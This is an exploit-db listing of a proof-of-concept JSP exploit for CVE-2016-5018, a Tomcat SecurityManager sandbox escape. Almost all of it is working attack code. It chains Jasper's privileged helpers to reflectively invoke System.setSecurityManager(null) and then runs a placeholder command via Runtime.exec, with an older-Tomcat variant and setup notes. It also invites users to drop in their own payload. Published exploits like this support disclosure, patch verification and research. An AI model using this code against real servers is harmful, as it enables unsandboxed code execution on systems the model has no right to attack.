Tomcat proprietaryEvaluate 9.0.0.M1 – Sandbox Escape

  • 作者: hantwister
    日期: 2020-01-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47892/
  • # Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
    # Date: 2020-01-07
    # Exploit Author: Harrison Neal, PatchAdvisor
    # Vendor Homepage: https://tomcat.apache.org/
    # Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
    # Version: 8.0.36 (the listing title names 9.0.0.M1; per the Apache advisory CVE-2016-5018 affects 6.0.0-6.0.45, 7.0.0-7.0.70, 8.0.0.RC1-8.0.36, 8.5.0-8.5.4 and 9.0.0.M1-9.0.0.M9, fixed in 6.0.47 / 7.0.72 / 8.0.37 / 8.5.5 / 9.0.0.M10)
    # Description: Security Manager sandbox escape from a deployed JSP, abusing Jasper's privileged helpers PageContextImpl.proprietaryEvaluate and JspRuntimeLibrary.introspecthelper to reach ApplicationContextFacade.executeMethod and call System.setSecurityManager(null). Only relevant when Tomcat runs with a SecurityManager; without one a JSP already has full JVM privileges.
    # Tested on: Windows (the demo payload launches calc.exe; replace the exec() call for other platforms)
    # CVE: CVE-2016-5018
     /* 
    # See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.
    # This PoC is only meaningful against a Tomcat that actually runs with a SecurityManager; the JSP below detects that and skips the escape otherwise.
    # When Tomcat 8 is configured to run as a Windows service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
    # In the Java tab, add the following options (one per line; the path contains spaces but needs no quoting there):
    # -Djava.security.manager
    # -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
    # Note: catalina.sh/catalina.bat "-security" uses "-Djava.security.policy==..." (double '=') so that catalina.policy replaces, rather than is appended to, the JRE's default policy; either form is enough to reproduce the escape.
     */
     
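     <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
    <%
    // PoC for CVE-2016-5018: escape Tomcat's SecurityManager sandbox from a JSP.
    //
    // Nothing here matters unless a SecurityManager is installed -- without one the
    // JSP already runs with full JVM privileges, so the escape is skipped and the
    // payload below runs directly.
    //
    // Mechanism. All three helpers live in Tomcat's own jars, which catalina.policy
    // trusts, so the reflective work they do on the JSP's behalf is privileged:
    //   1. PageContextImpl.proprietaryEvaluate() evaluates an EL expression that
    //      reflects over the ServletContext facade and returns its declared Method
    //      objects, private ones included.
    //   2. JspRuntimeLibrary.introspecthelper() sets the bean property
    //      "accessible" = "true" on the private Method, i.e. it ends up calling
    //      Method.setAccessible(true), which the sandboxed JSP could not do itself.
    //   3. ApplicationContextFacade.executeMethod(Method, Object, Object[]) invokes
    //      an arbitrary Method with Tomcat's privileges (presumably inside the
    //      facade's doPrivileged wrapper -- that is what makes this the escape;
    //      confirm against the exact build). We point it at
    //      System.setSecurityManager(null).
    //
    // Note that setSecurityManager() is JVM-global: while the manager is cleared,
    // every other thread and request in this Tomcat instance is unsandboxed too.
    SecurityManager sm = System.getSecurityManager();

    if (sm != null) {
        try {
            ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();

            { // Tomcat 7+
                // Step 1: get the facade's declared methods through privileged EL.
                Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
                    "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
                    Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7

                Method theMethod = null;

                for (Method m : methods) {
                    if ("executeMethod".equals(m.getName())) {
                        theMethod = m;
                        break;
                    }
                }

                // Fail loudly instead of letting introspecthelper(null, ...) NPE with
                // a stack trace that hides the real reason (no executeMethod on this
                // facade class => this build does not expose the primitive we need).
                if (theMethod == null) {
                    throw new IllegalStateException("executeMethod not found on "
                        + pageContext.getServletContext().getClass().getName()
                        + "; sandbox escape not attempted");
                }

                // Step 2: make the private method callable (Method.setAccessible(true)
                // done by Jasper on our behalf).
                JspRuntimeLibrary.introspecthelper(
                    theMethod,
                    "accessible",
                    "true",
                    request,
                    null,
                    false);

                // Step 3: executeMethod(method, target, params) with
                //   method = System.setSecurityManager(SecurityManager)
                //   target = null (static method)
                //   params = { null }  -> removes the SecurityManager.
                theMethod.invoke(pageContext.getServletContext(),
                    System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
                    null,
                    new Object[]{null}
                );
            }

            /* Alternative for Tomcat 5.5 and 6, where ProtectedFunctionMapper.mapFunction
               resolves the function Method itself (privileged) and the EL evaluator then
               calls it for us. Kept for reference; use instead of the block above.
            {
                pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
                PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
            }*/

        } catch (Throwable ex) {
            // Surface the failure in the response so a failed escape is diagnosable.
            PrintWriter pw = new PrintWriter(out);
            ex.printStackTrace(pw);
            pw.flush();
        }
    }

    // Your payload goes here. If the escape above failed the SecurityManager is still
    // active, exec() throws SecurityException and it is printed below instead.
    try {
        Runtime.getRuntime().exec("calc");
    } catch (Throwable ex) {
        PrintWriter pw = new PrintWriter(out);
        ex.printStackTrace(pw);
        pw.flush();
    }

    // Optionally put the security manager back, but only if the escape actually
    // cleared it. If it is still installed, the sandboxed JSP lacks the
    // RuntimePermission("setSecurityManager") this call needs under the default
    // catalina.policy and the page would end in an uncaught SecurityException (HTTP 500).
    if (sm != null && System.getSecurityManager() == null) {
        System.setSecurityManager(sm);
    }
    %>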